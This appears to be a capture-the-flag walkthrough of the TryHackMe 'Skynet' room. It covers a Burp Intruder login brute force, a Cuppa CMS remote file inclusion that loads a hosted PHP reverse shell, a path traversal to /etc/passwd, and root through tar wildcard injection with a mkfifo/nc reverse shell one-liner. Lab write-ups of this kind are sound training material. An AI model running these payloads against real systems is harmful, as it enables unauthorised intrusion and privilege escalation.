Skynet - THM

Are you able to compromise this Terminator themed machine?

Let's start with enumeration. Looks like we have 6 open ports - one being an apache web server.

It opens a simple search engine with no content in the page source. Gobuster gives us a few other areas to check into

It looks like /squirrelmail is the only thing that returns anything and it needs a name and a password. From the site, it looks like it's version 1.4.23 - there's an exploit found here but it says it needs credentials so we'll take a look at the hint: enumerate samba.

I found a great site that will help get us started here

Inside we see a note from Miles that due to a system malfunction all the employees are required to change their password. We see a log file of what look to be usernames or really easy passwords.

Well, let's try burpsuite with this list, using what I think will be a username of milesdyson. If you've never done a burpsuite intruder attack it's SO awesome, because it's so easy.

To get started, visit the squirrelmail page and start up burpsuite. I use a browser proxy to push traffic to it - THM has a great room for helping you understand how to setup the connection but you can also just use the internal browser for the app for this.

Send the milesdyson username with a blank password to have it capture that first post. In the burpsuite app, click on action and then Send to Intruder

On the Payload Positions area, we're going to click Clear to remove all the pre-determined variables it wants to use.

Next we're going to want to put our curser right after the equal sign following secretkey and click the add button twice to put two variable markers there (a start and end - think like quotes around something someone is saying).

When that's done, go up top and click on the tab for Payloads. We're going to click load and use the log1.txt file that we downloaded earlier. Once you're ready, let's click Start attack to begin.

Let this sit for a bit - it's a great time to catch another episode of Family Guy. I like to sort the status column so any outliers show up at the top of the list. We're looking for a different status number and usually a different length too.

We login to the site with that information and we can see all his email, cha-ching!. There's an email with a samba password in there too:

Password: )s{A&2Z=F^n_E.B`

Looking around the email there's a bunch of gobbily gook and some binary emails. Using a binary converter with the binary email we get something that looks a lot like the other gobbily gook email, both sent by serenakogan@skynet :

balls have zero to me to me to me to me to me to me to me to me to

This password does let us connect to the file share.

inside is a notes folder with a document that sticks out called important.txt we'll yeet a copy of that! Inside that file is the answer

That new url takes us to a Miles Dyson personal page with a little bit of background on him.

A google search for some info for the answer to the next question

I had to take a peek at the writeup at this point. Looks like I should have gobuster'd that new folder that was hidden. There's a administrator sub folder there. We try both of Mile's creds and they don't work.

The CMS is Cuppa and looking on exploid-db, there was only one there - it's a PHP Code Injection - which fits right in with our last clue of RFI. I'm gonna have to put the two together here and figure this out - this is my first RFI hack.

Using the exploit-db writeup there's a file in Cuppa CMS that's called /alerts/alertConfigField.php which, on line 22 calls "urlConfig" as part of the PHP $_REQUEST. It looks like we use that as a pointer to a fake "Config" to get the shell.

Here's what we did

http://10.10.155.198/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.80.170/ReverseShell.php

Let's download the pentestmonkey PHP reverse shell and modify it with our IP. Then we'll host it using a php web server like this

python3 -m http.server

Next we'll start a netcat listener like this

nc -lvnp 1234

Then we do a curl to our created URL above.

curl -L http://10.10.155.198/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.80.170/ReverseShell.php

This gets us a web user shell which also lets us access Miles' home directory to view the user flag.

The root flag hint says "a recursive call". OK so in that exploit there's an option to just view file system items too it's this:

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Let's try that -NOPE!

Okay I didn't do my due diligence here and poke around like I should have. Looking at the writeup real quick they talk about cronjobs. So I poked into that.

So we have one here running in milesdyson's backup's folder and it's running as root. Sweet.

so the script changes into the /var/www/html directory then tars up everything in that folder... nano doesn't exist here to edit it - but VIM does - unfortunately in read only though... so no editing the file directly. I checked out GTFOBins for some tar escalations but none worked.

Looking back at the writeup, it looks like there's an exploit here that talks about how running tar with the wildcard is vulnerable. There's three files needed.

1. A file called --checkpoint=1 - this will be picked up as a command, not an actual file. This normally displays a progress message for every numberth record - we're picking for every 1 file.

2. A file called --checkpoint-action=exec=sh shell.sh that is telling tar, after every 1 file, run a shell script we called shell.sh

3. Finally, a shell script we created called shell.sh that hosts our reverse shell script. We used the writeup line for this script

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f